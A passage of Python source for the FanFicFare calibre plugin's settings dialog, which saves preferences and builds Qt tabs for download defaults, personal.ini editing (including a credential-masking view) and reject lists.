            prefs['button_instantpopup'] = self.basic_tab.button_instantpopup.isChecked()
            prefs['updatedefault'] = self.basic_tab.updatedefault.isChecked()
            prefs['deleteotherforms'] = self.basic_tab.deleteotherforms.isChecked()
            prefs['adddialogstaysontop'] = self.basic_tab.adddialogstaysontop.isChecked()
            prefs['lookforurlinhtml'] = self.basic_tab.lookforurlinhtml.isChecked()
            prefs['checkforseriesurlid'] = self.basic_tab.checkforseriesurlid.isChecked()
            prefs['auto_reject_seriesurlid'] = self.basic_tab.auto_reject_seriesurlid.isChecked()
            prefs['mark_series_anthologies'] = self.basic_tab.mark_series_anthologies.isChecked()
            prefs['checkforurlchange'] = self.basic_tab.checkforurlchange.isChecked()
            prefs['injectseries'] = self.basic_tab.injectseries.isChecked()
            prefs['matchtitleauth'] = self.basic_tab.matchtitleauth.isChecked()
            prefs['do_wordcount'] = prefs_save_options[unicode(self.basic_tab.do_wordcount.currentText())]
            prefs['smarten_punctuation'] = self.basic_tab.smarten_punctuation.isChecked()
            prefs['reject_always'] = self.basic_tab.reject_always.isChecked()
            prefs['reject_delete_default'] = self.basic_tab.reject_delete_default.isChecked()

            if self.readinglist_tab:
                # lists
                prefs['send_lists'] = ', '.join([ x.strip() for x in unicode(self.readinglist_tab.send_lists_box.text()).split(',') if x.strip() ])
                prefs['read_lists'] = ', '.join([ x.strip() for x in unicode(self.readinglist_tab.read_lists_box.text()).split(',') if x.strip() ])
                prefs['addtolists'] = self.readinglist_tab.addtolists.isChecked()
                prefs['addtoreadlists'] = self.readinglist_tab.addtoreadlists.isChecked()
                prefs['addtolistsonread'] = self.readinglist_tab.addtolistsonread.isChecked()
                prefs['autounnew'] = self.readinglist_tab.autounnew.isChecked()

            # personal.ini
            ini = self.personalini_tab.personalini
            if ini:
                prefs['personal.ini'] = ini
            else:
                # if they've removed everything, reset to default.
                prefs['personal.ini'] = get_resources('plugin-example.ini')

            prefs['cal_cols_pass_in'] = self.personalini_tab.cal_cols_pass_in.isChecked()

            # Covers tab
            prefs['updatecalcover'] = prefs_save_options[unicode(self.calibrecover_tab.updatecalcover.currentText())]
            # for backward compatibility:
            prefs['updatecover'] = prefs['updatecalcover'] == SAVE_YES
            prefs['gencalcover'] = prefs_save_options[unicode(self.calibrecover_tab.gencalcover.currentText())]
            prefs['calibre_gen_cover'] = self.calibrecover_tab.calibre_gen_cover.isChecked()
            prefs['plugin_gen_cover'] = self.calibrecover_tab.plugin_gen_cover.isChecked()
            prefs['gcnewonly'] = self.calibrecover_tab.gcnewonly.isChecked()
            prefs['covernewonly'] = self.calibrecover_tab.covernewonly.isChecked()
            # Per-site Generate Cover settings; 'none' entries are dropped.
            gc_site_settings = {}
            for (site,combo) in six.iteritems(self.calibrecover_tab.gc_dropdowns):
                val = unicode(combo.itemData(combo.currentIndex()))
                if val != 'none':
                    gc_site_settings[site] = val
            prefs['gc_site_settings'] = gc_site_settings
            prefs['allow_gc_from_ini'] = self.calibrecover_tab.allow_gc_from_ini.isChecked()
            prefs['gc_polish_cover'] = self.calibrecover_tab.gc_polish_cover.isChecked()

            # Count Pages tab: build the list of statistics to collect.
            countpagesstats = []

            if self.countpages_tab.pagecount.isChecked():
                countpagesstats.append('PageCount')
            if self.countpages_tab.wordcount.isChecked():
                countpagesstats.append('WordCount')
            if self.countpages_tab.fleschreading.isChecked():
                countpagesstats.append('FleschReading')
            if self.countpages_tab.fleschgrade.isChecked():
                countpagesstats.append('FleschGrade')
            if self.countpages_tab.gunningfog.isChecked():
                countpagesstats.append('GunningFog')

            prefs['countpagesstats'] = countpagesstats
            # wordcountmissing only applies when wordcount itself is on.
            prefs['wordcountmissing'] = self.countpages_tab.wordcount.isChecked() and self.countpages_tab.wordcountmissing.isChecked()

            # Standard Columns tab
            colsnewonly = {}
            for (col,checkbox) in six.iteritems(self.std_columns_tab.stdcol_newonlycheck):
                colsnewonly[col] = checkbox.isChecked()
            prefs['std_cols_newonly'] = colsnewonly

            prefs['suppressauthorsort'] = self.std_columns_tab.suppressauthorsort.isChecked()
            prefs['suppresstitlesort'] = self.std_columns_tab.suppresstitlesort.isChecked()
            prefs['authorcase'] = self.std_columns_tab.authorcase.isChecked()
            prefs['titlecase'] = self.std_columns_tab.titlecase.isChecked()
            prefs['setanthologyseries'] = self.std_columns_tab.setanthologyseries.isChecked()
            prefs['set_author_url'] =self.std_columns_tab.set_author_url.isChecked()
            prefs['set_series_url'] =self.std_columns_tab.set_series_url.isChecked()
            prefs['includecomments'] =self.std_columns_tab.includecomments.isChecked()
            prefs['anth_comments_newonly'] =self.std_columns_tab.anth_comments_newonly.isChecked()

            # Custom Columns tab
            # error column
            prefs['errorcol'] = unicode(self.cust_columns_tab.errorcol.itemData(self.cust_columns_tab.errorcol.currentIndex()))
            prefs['save_all_errors'] = self.cust_columns_tab.save_all_errors.isChecked()

            # metadata column
            prefs['savemetacol'] = unicode(self.cust_columns_tab.savemetacol.itemData(self.cust_columns_tab.savemetacol.currentIndex()))

            # lastchecked column
            prefs['lastcheckedcol'] = unicode(self.cust_columns_tab.lastcheckedcol.itemData(self.cust_columns_tab.lastcheckedcol.currentIndex()))

            # cust cols tab: custom column -> metadata mapping, 'none' dropped.
            colsmap = {}
            for (col,combo) in six.iteritems(self.cust_columns_tab.custcol_dropdowns):
                val = unicode(combo.itemData(combo.currentIndex()))
                if val != 'none':
                    colsmap[col] = val
            prefs['custom_cols'] = colsmap

            colsnewonly = {}
            for (col,checkbox) in six.iteritems(self.cust_columns_tab.custcol_newonlycheck):
                colsnewonly[col] = checkbox.isChecked()
            prefs['custom_cols_newonly'] = colsnewonly

            prefs['allow_custcol_from_ini'] = self.cust_columns_tab.allow_custcol_from_ini.isChecked()

            # Email Settings tab
            prefs['imapserver'] = unicode(self.imap_tab.imapserver.text()).strip()
            prefs['imapuser'] = unicode(self.imap_tab.imapuser.text()).strip()
            prefs['imappass'] = unicode(self.imap_tab.imappass.text()).strip()
            prefs['imapfolder'] = unicode(self.imap_tab.imapfolder.text()).strip()
            prefs['imaptags'] = ', '.join([ x.strip() for x in unicode(self.imap_tab.imaptags.text()).split(',') if x.strip() ])
            prefs['imapmarkread'] = self.imap_tab.imapmarkread.isChecked()
            prefs['imapsessionpass'] = self.imap_tab.imapsessionpass.isChecked()
            prefs['auto_reject_from_email'] = self.imap_tab.auto_reject_from_email.isChecked()
            prefs['update_existing_only_from_email'] = self.imap_tab.update_existing_only_from_email.isChecked()
            prefs['download_from_email_immediately'] = self.imap_tab.download_from_email_immediately.isChecked()

            prefs.save_to_db()
            self.plugin_action.set_popup_mode()

    def edit_shortcuts(self):
        """Save settings, then open calibre's keyboard-shortcut dialog."""
        self.save_settings()
        # Force the menus to be rebuilt immediately, so we have all our actions registered
        self.plugin_action.rebuild_menus()
        d = KeyboardConfigDialog(self.plugin_action.gui, self.plugin_action.action_spec[0])
        if d.exec_() == d.Accepted:
            self.plugin_action.gui.keyboard.finalize()
class BasicTab(QWidget):
    """'Basic' tab of the config dialog: download defaults, calibre
    update behavior, post-processing, GUI options and the Reject List.
    """
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)

        topl = QVBoxLayout()
        self.setLayout(topl)

        label = QLabel(_('These settings control the basic features of the plugin--downloading FanFiction.'))
        label.setWordWrap(True)
        topl.addWidget(label)

        defs_gb = groupbox = QGroupBox(_("Defaults Options on Download"))
        self.l = QVBoxLayout()
        groupbox.setLayout(self.l)

        tooltip = _("On each download, FanFicFare offers an option to select the output format. <br />This sets what that option will default to.")
        horz = QHBoxLayout()
        label = QLabel(_('Default Output &Format:'))
        label.setToolTip(tooltip)
        horz.addWidget(label)
        self.fileform = QComboBox(self)
        self.fileform.addItem('epub')
        self.fileform.addItem('mobi')
        self.fileform.addItem('html')
        self.fileform.addItem('txt')
        self.fileform.setCurrentIndex(self.fileform.findText(prefs['fileform']))
        self.fileform.setToolTip(tooltip)
        # Collision choices depend on format (Update only works for epub).
        self.fileform.activated.connect(self.set_collisions)
        label.setBuddy(self.fileform)
        horz.addWidget(self.fileform)
        self.l.addLayout(horz)

        tooltip = _("On each download, FanFicFare offers an option of what happens if that story already exists. <br />This sets what that option will default to.")
        horz = QHBoxLayout()
        label = QLabel(_('Default If Story Already Exists?'))
        label.setToolTip(tooltip)
        horz.addWidget(label)
        self.collision = QComboBox(self)
        # add collision options
        self.set_collisions()
        i = self.collision.findText(save_collisions[prefs['collision']])
        if i > -1:
            self.collision.setCurrentIndex(i)
        self.collision.setToolTip(tooltip)
        label.setBuddy(self.collision)
        horz.addWidget(self.collision)
        self.l.addLayout(horz)

        horz = QHBoxLayout()
        self.updatemeta = QCheckBox(_('Default Update Calibre &Metadata?'),self)
        self.updatemeta.setToolTip(_("On each download, FanFicFare offers an option to update Calibre's metadata (title, author, URL, tags, custom columns, etc) from the web site. <br />This sets whether that will default to on or off. <br />Columns set to 'New Only' in the column tabs will only be set for new books."))
        self.updatemeta.setChecked(prefs['updatemeta'])
        horz.addWidget(self.updatemeta)

        self.bgmeta = QCheckBox(_('Default Background Metadata?'),self)
        self.bgmeta.setToolTip(_("On each download, FanFicFare offers an option to Collect Metadata from sites in a Background process.<br />This returns control to you quicker while updating, but you won't be asked for username/passwords or if you are an adult--stories that need those will just fail.<br />Only available for Update/Overwrite of existing books in case URL given isn't canonical or matches to existing book by Title/Author."))
        self.bgmeta.setChecked(prefs['bgmeta'])
        horz.addWidget(self.bgmeta)
        self.l.addLayout(horz)

        cali_gb = groupbox = QGroupBox(_("Updating Calibre Options"))
        self.l = QVBoxLayout()
        groupbox.setLayout(self.l)

        self.deleteotherforms = QCheckBox(_('Delete other existing formats?'),self)
        self.deleteotherforms.setToolTip(_('Check this to automatically delete all other ebook formats when updating an existing book.\nHandy if you have both a Nook(epub) and Kindle(mobi), for example.'))
        self.deleteotherforms.setChecked(prefs['deleteotherforms'])
        self.l.addWidget(self.deleteotherforms)

        self.keeptags = QCheckBox(_('Keep Existing Tags when Updating Metadata?'),self)
        self.keeptags.setToolTip(_("Existing tags will be kept and any new tags added.\n%(cmplt)s and %(inprog)s tags will be still be updated, if known.\n%(lul)s tags will be updated if %(lus)s in %(is)s.\n(If Tags is set to 'New Only' in the Standard Columns tab, this has no effect.)")%no_trans)
        self.keeptags.setChecked(prefs['keeptags'])
        self.l.addWidget(self.keeptags)

        self.checkforseriesurlid = QCheckBox(_("Check for existing Series Anthology books?"),self)
        self.checkforseriesurlid.setToolTip(_("Check for existing Series Anthology books using each new story's series URL before downloading.\nOffer to skip downloading if a Series Anthology is found.\nDoesn't work when Collect Metadata in Background is selected."))
        self.checkforseriesurlid.setChecked(prefs['checkforseriesurlid'])
        self.l.addWidget(self.checkforseriesurlid)

        self.auto_reject_seriesurlid = QCheckBox(_("Reject Without Confirmation?"),self)
        self.auto_reject_seriesurlid.setToolTip(_("Automatically reject storys with existing Series Anthology books.\nOnly works if 'Check for existing Series Anthology books' is on.\nDoesn't work when Collect Metadata in Background is selected."))
        self.auto_reject_seriesurlid.setChecked(prefs['auto_reject_seriesurlid'])
        self.auto_reject_seriesurlid.setEnabled(self.checkforseriesurlid.isChecked())

        self.mark_series_anthologies = QCheckBox(_("Mark Matching Anthologies?"),self)
        self.mark_series_anthologies.setToolTip(_("Mark and show existing Series Anthology books when individual updates are skipped.\nOnly works if 'Check for existing Series Anthology books' is on.\nDoesn't work when Collect Metadata in Background is selected."))
        self.mark_series_anthologies.setChecked(prefs['mark_series_anthologies'])
        self.mark_series_anthologies.setEnabled(self.checkforseriesurlid.isChecked())

        # Keep the two sub-options enabled only while their parent
        # checkbox is checked.
        def mark_anthologies():
            self.auto_reject_seriesurlid.setEnabled(self.checkforseriesurlid.isChecked())
            self.mark_series_anthologies.setEnabled(self.checkforseriesurlid.isChecked())
        self.checkforseriesurlid.stateChanged.connect(mark_anthologies)
        mark_anthologies()

        horz = QHBoxLayout()
        horz.addItem(QtGui.QSpacerItem(20, 1))
        vertright = QVBoxLayout()
        horz.addLayout(vertright)
        vertright.addWidget(self.auto_reject_seriesurlid)
        vertright.addWidget(self.mark_series_anthologies)
        self.l.addLayout(horz)

        self.checkforurlchange = QCheckBox(_("Check for changed Story URL?"),self)
        self.checkforurlchange.setToolTip(_("Warn you if an update will change the URL of an existing book(normally automatic and silent).\nURLs may be changed from http to https silently if the site changed."))
        self.checkforurlchange.setChecked(prefs['checkforurlchange'])
        self.l.addWidget(self.checkforurlchange)

        self.lookforurlinhtml = QCheckBox(_("Search inside ebooks for Story URL?"),self)
        self.lookforurlinhtml.setToolTip(_("Look for first valid story URL inside EPUB, ZIP(HTML) or TXT ebook formats if not found in metadata.\nSomewhat risky, could find wrong URL depending on ebook content."))
        self.lookforurlinhtml.setChecked(prefs['lookforurlinhtml'])
        self.l.addWidget(self.lookforurlinhtml)

        proc_gb = groupbox = QGroupBox(_("Post Processing Options"))
        self.l = QVBoxLayout()
        groupbox.setLayout(self.l)

        self.mark = QCheckBox(_("Mark added/updated books when finished?"),self)
        self.mark.setToolTip(_("Mark added/updated books when finished. Use with option below.\nYou can also manually search for 'marked:fff_success'.\n'marked:fff_failed' and 'marked:fff_chapter_error' are also available, or search 'marked:fff' for all."))
        self.mark.setChecked(prefs['mark'])
        self.l.addWidget(self.mark)
        horz = QHBoxLayout()
        horz.addItem(QtGui.QSpacerItem(20, 1))
        self.l.addLayout(horz)

        self.mark_success = QCheckBox(_("Success"),self)
        self.mark_success.setToolTip(_("Mark successfully downloaded or updated books."))
        self.mark_success.setChecked(prefs['mark_success'])
        # FIX: initial enabled state follows the parent 'mark' checkbox.
        # It was mistakenly tied to checkforseriesurlid (copy-paste from
        # the anthology section); mark_state() below shows the intent.
        self.mark_success.setEnabled(self.mark.isChecked())
        horz.addWidget(self.mark_success)

        self.mark_failed = QCheckBox(_("Failed"),self)
        self.mark_failed.setToolTip(_("Mark failed downloaded or updated books."))
        self.mark_failed.setChecked(prefs['mark_failed'])
        # FIX: same copy-paste correction as mark_success above.
        self.mark_failed.setEnabled(self.mark.isChecked())
        horz.addWidget(self.mark_failed)

        self.mark_chapter_error = QCheckBox(_("Chapter Error"),self)
        self.mark_chapter_error.setToolTip(_("Mark downloaded or updated books with chapter errors (only when <i>continue_on_chapter_error:true</i>)."))
        self.mark_chapter_error.setChecked(prefs['mark_chapter_error'])
        # FIX: same copy-paste correction as mark_success above.
        self.mark_chapter_error.setEnabled(self.mark.isChecked())
        horz.addWidget(self.mark_chapter_error)

        # Keep the three sub-options enabled only while 'mark' is checked.
        def mark_state():
            self.mark_success.setEnabled(self.mark.isChecked())
            self.mark_failed.setEnabled(self.mark.isChecked())
            self.mark_chapter_error.setEnabled(self.mark.isChecked())
        self.mark.stateChanged.connect(mark_state)
        mark_state()

        self.showmarked = QCheckBox(_("Show Marked books when finished?"),self)
        self.showmarked.setToolTip(_("Show Marked added/updated books only when finished.\nYou can also manually search for 'marked:fff_success'.\n'marked:fff_failed' and 'marked:fff_chapter_error' are also available, or search 'marked:fff' for all."))
        self.showmarked.setChecked(prefs['showmarked'])
        self.l.addWidget(self.showmarked)

        self.smarten_punctuation = QCheckBox(_('Smarten Punctuation (EPUB only)'),self)
        self.smarten_punctuation.setToolTip(_("Run Smarten Punctuation from Calibre's Polish Book feature on each EPUB download and update."))
        self.smarten_punctuation.setChecked(prefs['smarten_punctuation'])
        self.l.addWidget(self.smarten_punctuation)

        tooltip = _("Calculate Word Counts using Calibre internal methods.\n"
                    "Many sites include Word Count, but many do not.\n"
                    "This will count the words in each book and include it as if it came from the site.")
        horz = QHBoxLayout()
        label = QLabel(_('Calculate Word Count:'))
        label.setToolTip(tooltip)
        horz.addWidget(label)
        self.do_wordcount = QComboBox(self)
        for i in do_wordcount_order:
            self.do_wordcount.addItem(i)
        self.do_wordcount.setCurrentIndex(self.do_wordcount.findText(prefs_save_options[prefs['do_wordcount']]))
        self.do_wordcount.setToolTip(tooltip)
        label.setBuddy(self.do_wordcount)
        horz.addWidget(self.do_wordcount)
        self.l.addLayout(horz)

        self.autoconvert = QCheckBox(_("Automatically Convert new/update books?"),self)
        self.autoconvert.setToolTip(_("Automatically call calibre's Convert for new/update books.\nConverts to the current output format as chosen in calibre's\nPreferences->Behavior settings."))
        self.autoconvert.setChecked(prefs['autoconvert'])
        self.l.addWidget(self.autoconvert)

        gui_gb = groupbox = QGroupBox(_("GUI Options"))
        self.l = QVBoxLayout()
        groupbox.setLayout(self.l)

        self.urlsfromclip = QCheckBox(_('Take URLs from Clipboard?'),self)
        self.urlsfromclip.setToolTip(_('Prefill URLs from valid URLs in Clipboard when Adding New.'))
        self.urlsfromclip.setChecked(prefs['urlsfromclip'])
        self.l.addWidget(self.urlsfromclip)

        self.button_instantpopup = QCheckBox(_('FanFicFare button opens menu?'),self)
        self.button_instantpopup.setToolTip(_('The FanFicFare toolbar button will bring up the plugin menu. If unchecked, it will <i>Download from URLs</i> or optionally Update, see below.'))
        self.button_instantpopup.setChecked(prefs['button_instantpopup'])
        self.l.addWidget(self.button_instantpopup)

        self.updatedefault = QCheckBox(_('Default to Update when books selected?'),self)
        self.updatedefault.setToolTip(_('The FanFicFare toolbar button will Update if books are selected. If unchecked, it will always <i>Download from URLs</i>.'))
        self.updatedefault.setChecked(prefs['updatedefault'])
        # Only meaningful when the button does NOT open the menu.
        self.updatedefault.setEnabled(not self.button_instantpopup.isChecked())
        self.button_instantpopup.stateChanged.connect(lambda x : self.updatedefault.setEnabled(not self.button_instantpopup.isChecked()))
        horz = QHBoxLayout()
        horz.addItem(QtGui.QSpacerItem(20, 1))
        horz.addWidget(self.updatedefault)
        self.l.addLayout(horz)

        self.adddialogstaysontop = QCheckBox(_("Keep 'Add New from URL(s)' dialog on top?"),self)
        self.adddialogstaysontop.setToolTip(_("Instructs the OS and Window Manager to keep the 'Add New from URL(s)'\ndialog on top of all other windows. Useful for dragging URLs onto it."))
        self.adddialogstaysontop.setChecked(prefs['adddialogstaysontop'])
        self.l.addWidget(self.adddialogstaysontop)

        self.show_est_time = QCheckBox(_("Show estimated time left?"),self)
        self.show_est_time.setToolTip(_("When a Progress Bar is shown, show a rough estimate of the time left."))
        self.show_est_time.setChecked(prefs['show_est_time'])
        self.l.addWidget(self.show_est_time)

        misc_gb = groupbox = QGroupBox(_("Misc Options"))
        self.l = QVBoxLayout()
        groupbox.setLayout(self.l)

        self.injectseries = QCheckBox(_("Inject calibre Series when none found?"),self)
        self.injectseries.setToolTip(_("If no series is found, inject the calibre series (if there is one) so \nit appears on the FanFicFare title page(not cover)."))
        self.injectseries.setChecked(prefs['injectseries'])
        self.l.addWidget(self.injectseries)

        self.matchtitleauth = QCheckBox(_("Search by Title/Author(s) for If Story Already Exists?"),self)
        self.matchtitleauth.setToolTip(_("When checking <i>If Story Already Exists</i> FanFicFare will first match by URL Identifier. But if not found, it can also search existing books by Title and Author(s)."))
        self.matchtitleauth.setChecked(prefs['matchtitleauth'])
        self.l.addWidget(self.matchtitleauth)

        rej_gb = groupbox = QGroupBox(_("Reject List"))
        self.l = QVBoxLayout()
        groupbox.setLayout(self.l)

        self.rejectlist = QPushButton(_('Edit Reject URL List'), self)
        self.rejectlist.setToolTip(_("Edit list of URLs FanFicFare will automatically Reject."))
        self.rejectlist.clicked.connect(self.show_rejectlist)
        self.l.addWidget(self.rejectlist)

        self.reject_urls = QPushButton(_('Add Reject URLs'), self)
        self.reject_urls.setToolTip(_("Add additional URLs to Reject as text."))
        self.reject_urls.clicked.connect(self.add_reject_urls)
        self.l.addWidget(self.reject_urls)

        self.reject_reasons = QPushButton(_('Edit Reject Reasons List'), self)
        self.reject_reasons.setToolTip(_("Customize the Reasons presented when Rejecting URLs"))
        self.reject_reasons.clicked.connect(self.show_reject_reasons)
        self.l.addWidget(self.reject_reasons)

        self.reject_always = QCheckBox(_('Reject Without Confirmation?'),self)
        self.reject_always.setToolTip(_("Always reject URLs on the Reject List without stopping and asking."))
        self.reject_always.setChecked(prefs['reject_always'])
        self.l.addWidget(self.reject_always)

        self.reject_delete_default = QCheckBox(_('Delete on Reject by Default?'),self)
        self.reject_delete_default.setToolTip(_("Should the checkbox to delete Rejected books be checked by default?"))
        self.reject_delete_default.setChecked(prefs['reject_delete_default'])
        self.l.addWidget(self.reject_delete_default)

        # Overall layout: defaults on top, then two columns of groupboxes.
        topl.addWidget(defs_gb)
        horz = QHBoxLayout()
        vertleft = QVBoxLayout()
        vertleft.addWidget(cali_gb)
        vertleft.addWidget(proc_gb)
        vertright = QVBoxLayout()
        vertright.addWidget(gui_gb)
        vertright.addWidget(misc_gb)
        vertright.addWidget(rej_gb)
        horz.addLayout(vertleft)
        horz.addLayout(vertright)
        topl.addLayout(horz)
        topl.insertStretch(-1)

    def set_collisions(self):
        """Rebuild the collision combo for the current format, keeping the
        previous selection when still valid (Update* are epub-only)."""
        prev = self.collision.currentText()
        self.collision.clear()
        for o in collision_order:
            if self.fileform.currentText() == 'epub' or o not in [UPDATE,UPDATEALWAYS]:
                self.collision.addItem(o)
        i = self.collision.findText(prev)
        if i > -1:
            self.collision.setCurrentIndex(i)

    def show_rejectlist(self):
        """Open the Reject URL List editor; on accept, replace the list."""
        with busy_cursor():
            d = RejectListDialog(self,
                                 rejecturllist.get_list(),
                                 rejectreasons=rejecturllist.get_reject_reasons(),
                                 header=_("Edit Reject URLs List"),
                                 show_delete=False,
                                 show_all_reasons=False)
        d.exec_()
        if d.result() != d.Accepted:
            return
        with busy_cursor():
            rejecturllist.add(d.get_reject_list(),clear=True)

    def show_reject_reasons(self):
        """Open a plain-text editor for the canned reject reasons."""
        d = EditTextDialog(self,
                           prefs['rejectreasons'],
                           icon=self.windowIcon(),
                           title=_("Reject Reasons"),
                           label=_("Customize Reject List Reasons"),
                           tooltip=_("Customize the Reasons presented when Rejecting URLs"),
                           save_size_name='fff:Reject List Reasons')
        d.exec_()
        if d.result() == d.Accepted:
            prefs['rejectreasons'] = d.get_plain_text()

    def add_reject_urls(self):
        """Open a text dialog for bulk-adding reject URLs (one per line)."""
        d = EditTextDialog(self,
                           "http://example.com/story.php?sid=5,"+_("Reason why I rejected it")+"\nhttp://example.com/story.php?sid=6,"+_("Title by Author")+" - "+_("Reason why I rejected it"),
                           icon=self.windowIcon(),
                           title=_("Add Reject URLs"),
                           label=_("Add Reject URLs. Use: <b>http://...,note</b> or <b>http://...,title by author - note</b><br>Invalid story URLs will be ignored."),
                           tooltip=_("One URL per line:\n<b>http://...,note</b>\n<b>http://...,title by author - note</b>"),
                           rejectreasons=rejecturllist.get_reject_reasons(),
                           reasonslabel=_('Add this reason to all URLs added:'),
                           save_size_name='fff:Add Reject List')
        d.exec_()
        if d.result() == d.Accepted:
            rejecturllist.add_text(d.get_plain_text(),d.get_reason_text())
class PersonalIniTab(QWidget):
    """'personal.ini' tab: edit/view personal.ini, view plugin defaults,
    and configure/list calibre columns passed into FanFicFare.

    The edited ini text is held in self.personalini; ConfigWidget
    reads it back in save_settings().
    """
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)

        self.l = QVBoxLayout()
        self.setLayout(self.l)

        label = QLabel(_('These settings provide more detailed control over what metadata will be displayed inside the ebook as well as let you set %(isa)s and %(u)s/%(p)s for different sites.')%no_trans)
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)

        # Working copy of the ini text; only saved to prefs when the
        # config dialog is accepted.
        self.personalini = prefs['personal.ini']

        groupbox = QGroupBox(_("personal.ini"))
        vert = QVBoxLayout()
        groupbox.setLayout(vert)
        self.l.addWidget(groupbox)

        horz = QHBoxLayout()
        vert.addLayout(horz)
        self.ini_button = QPushButton(_('Edit personal.ini'), self)
        #self.ini_button.setToolTip(_("Edit personal.ini file."))
        self.ini_button.clicked.connect(self.add_ini_button)
        horz.addWidget(self.ini_button)
        label = QLabel(_("FanFicFare now includes find, color coding, and error checking for personal.ini editing. Red generally indicates errors."))
        label.setWordWrap(True)
        horz.addWidget(label)
        vert.addSpacing(5)

        horz = QHBoxLayout()
        vert.addLayout(horz)
        # NOTE(review): rebinds self.ini_button, dropping the attribute
        # reference to the Edit button above -- harmless since the layout
        # keeps the widget alive, but confirm it's intentional.
        self.ini_button = QPushButton(_('View "Safe" personal.ini'), self)
        #self.ini_button.setToolTip(_("Edit personal.ini file."))
        self.ini_button.clicked.connect(self.safe_ini_button)
        horz.addWidget(self.ini_button)
        label = QLabel(_("View your personal.ini with usernames and passwords removed. For safely sharing your personal.ini settings with others."))
        label.setWordWrap(True)
        horz.addWidget(label)
        self.l.addSpacing(5)

        groupbox = QGroupBox(_("defaults.ini"))
        horz = QHBoxLayout()
        groupbox.setLayout(horz)
        self.l.addWidget(groupbox)
        view_label = _("View all of the plugin's configurable settings\nand their default settings.")
        self.defaults = QPushButton(_('View Defaults')+' (plugin-defaults.ini)', self)
        self.defaults.setToolTip(view_label)
        self.defaults.clicked.connect(self.show_defaults)
        horz.addWidget(self.defaults)
        label = QLabel(view_label)
        label.setWordWrap(True)
        horz.addWidget(label)
        self.l.addSpacing(5)

        groupbox = QGroupBox(_("Calibre Columns"))
        vert = QVBoxLayout()
        groupbox.setLayout(vert)
        self.l.addWidget(groupbox)

        horz = QHBoxLayout()
        vert.addLayout(horz)
        # NOTE(review): this _() string currently contains no %(...)s
        # placeholders, so the %no_trans below is a no-op -- presumably
        # kept for consistency with the other labels.
        pass_label = _("If checked, when updating/overwriting an existing book, FanFicFare will have the Calibre Columns available to use in replace_metadata, title_page, etc.<br>Click the button below to see the Calibre Column names.")%no_trans
        self.cal_cols_pass_in = QCheckBox(_('Pass Calibre Columns into FanFicFare on Update/Overwrite')%no_trans,self)
        self.cal_cols_pass_in.setToolTip(pass_label)
        self.cal_cols_pass_in.setChecked(prefs['cal_cols_pass_in'])
        horz.addWidget(self.cal_cols_pass_in)
        label = QLabel(pass_label)
        label.setWordWrap(True)
        horz.addWidget(label)
        vert.addSpacing(5)

        horz = QHBoxLayout()
        vert.addLayout(horz)
        col_label = _("FanFicFare can pass the Calibre Columns into the download/update process.<br>This will show you the columns available by name.")
        self.showcalcols = QPushButton(_('Show Calibre Column Names'), self)
        self.showcalcols.setToolTip(col_label)
        self.showcalcols.clicked.connect(self.show_showcalcols)
        horz.addWidget(self.showcalcols)
        label = QLabel(col_label)
        label.setWordWrap(True)
        horz.addWidget(label)

        label = QLabel(_("Changes will only be saved if you click 'OK' to leave Customize FanFicFare."))
        label.setWordWrap(True)
        self.l.addWidget(label)

        self.l.insertStretch(-1)

    def show_defaults(self):
        """Show the read-only plugin-defaults.ini shipped with the plugin."""
        IniTextDialog(self,
                      get_resources('plugin-defaults.ini').decode('utf-8'),
                      icon=self.windowIcon(),
                      title=_('Plugin Defaults'),
                      label=_("Plugin Defaults (%s) (Read-Only)")%'plugin-defaults.ini',
                      use_find=True,
                      read_only=True,
                      save_size_name='fff:defaults.ini').exec_()

    def safe_ini_button(self):
        """Show personal.ini with username/password values masked out,
        for safe sharing."""
        # Replace everything after 'username:'/'password:'/'=' with XXXXXXXX,
        # line by line.
        personalini = re.sub(r'((username|password) *[=:]).*$',r'\1XXXXXXXX',self.personalini,flags=re.MULTILINE)
        d = EditTextDialog(self,
                           personalini,
                           icon=self.windowIcon(),
                           title=_("View 'Safe' personal.ini"),
                           label=_("View your personal.ini with usernames and passwords removed. For safely sharing your personal.ini settings with others."),
                           save_size_name='fff:safe personal.ini',
                           read_only=True)
        d.exec_()

    def add_ini_button(self):
        """Open the personal.ini editor; keep the edited text on accept."""
        d = IniTextDialog(self,
                          self.personalini,
                          icon=self.windowIcon(),
                          title=_("Edit personal.ini"),
                          label=_("Edit personal.ini"),
                          use_find=True,
                          save_size_name='fff:personal.ini')
        d.exec_()
        if d.result() == d.Accepted:
            self.personalini = d.get_plain_text()

    def show_showcalcols(self):
        """List the calibre_std_* / calibre_cust_* entry names usable from
        personal.ini, sorted by entry name."""
        lines=[]#[('calibre_std_user_categories',_('User Categories'))]
        for k,f in six.iteritems(field_metadata):
            if f['name'] and k not in STD_COLS_SKIP: # only if it has a human readable name.
                lines.append(('calibre_std_'+k,f['name']))
        for k, column in six.iteritems(self.plugin_action.gui.library_view.model().custom_columns):
            # Skip the column used for saved metadata, if configured.
            if k != prefs['savemetacol']:
                # custom always have name.
                lines.append(('calibre_cust_'+k[1:],column['name']))
        lines.sort() # sort by key.
        EditTextDialog(self,
                       '\n'.join(['%s (%s)'%(l,k) for (k,l) in lines]),
                       icon=self.windowIcon(),
                       title=_('Calibre Column Entry Names'),
                       label=_('Label (entry_name)'),
                       read_only=True,
                       save_size_name='fff:showcalcols').exec_()
class ReadingListTab(QWidget):
    '''Config tab for integration with the Reading List plugin:
    optionally adds new/updated stories to "Send to Device" and/or
    "To Read" lists.'''
    def __init__(self, parent_dialog, plugin_action):
        self.parent_dialog = parent_dialog
        self.plugin_action = plugin_action
        QWidget.__init__(self)
        self.l = QVBoxLayout()
        self.setLayout(self.l)
        # The Reading List plugin may not be installed -- fall back to
        # an empty completion list of list names.
        try:
            rl_plugin = plugin_action.gui.iactions['Reading List']
            reading_lists = rl_plugin.get_list_names()
        except KeyError:
            reading_lists= []
        label = QLabel(_('These settings provide integration with the %(rl)s Plugin. %(rl)s can automatically send to devices and change custom columns. You have to create and configure the lists in %(rl)s to be useful.')%no_trans)
        label.setWordWrap(True)
        self.l.addWidget(label)
        self.l.addSpacing(5)
        # "Send to Device" list settings.
        self.addtolists = QCheckBox(_('Add new/updated stories to "Send to Device" Reading List(s).'),self)
        self.addtolists.setToolTip(_('Automatically add new/updated stories to these lists in the %(rl)s plugin.')%no_trans)
